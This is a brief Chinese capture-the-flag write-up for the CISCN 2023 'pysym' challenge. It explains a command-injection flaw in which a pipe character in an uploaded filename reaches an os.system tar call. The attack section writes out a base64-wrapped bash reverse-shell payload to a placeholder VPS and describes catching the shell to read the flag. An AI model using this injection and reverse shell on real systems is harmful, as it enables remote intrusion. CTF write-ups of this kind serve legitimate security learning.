[CISCN 2023 华北]pysym wp
[CISCN 2023 华北]pysym wp
Moonbeaut[CISCN 2023 华北]pysym wp
一、源码分析
经过浏览源码可知
os.system(‘tar --absolute-names -xvf {} -C {}’.format(savepath,directory)) |
这一行代码,当解压的时候,可以利用管道符 |
去拼接我们的命令
首先检查上传文件是否为空以及文件大小,对文件名进行路径拼接,然后给出上传成功后随机的文件路径,try
命令执行tar
解压文件,这里存在RCE
漏洞,我们可以利用|
去命令执行
因为os.system
是无回显的,我们尝试反弹shell
除此之外,发现当savepath
包含一些特殊字符时会引发file.save(savepath)
报错,用base64
避免
二、攻击过程

使用bp
抓包,修改文件名为构造的payload
,使用base64
编码

bash -c 'bash -i >& /dev/tcp/VPS_IP/port 0>&1' |
将构造的命令进行base64
编码

将bp
抓到的包发到重放模块,在上传的文件名后拼接base64
编码后的payload
后发包

同时在VPS
上开启端口监听,成功反弹shell
,进入根目录后找到flag

三、flag

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果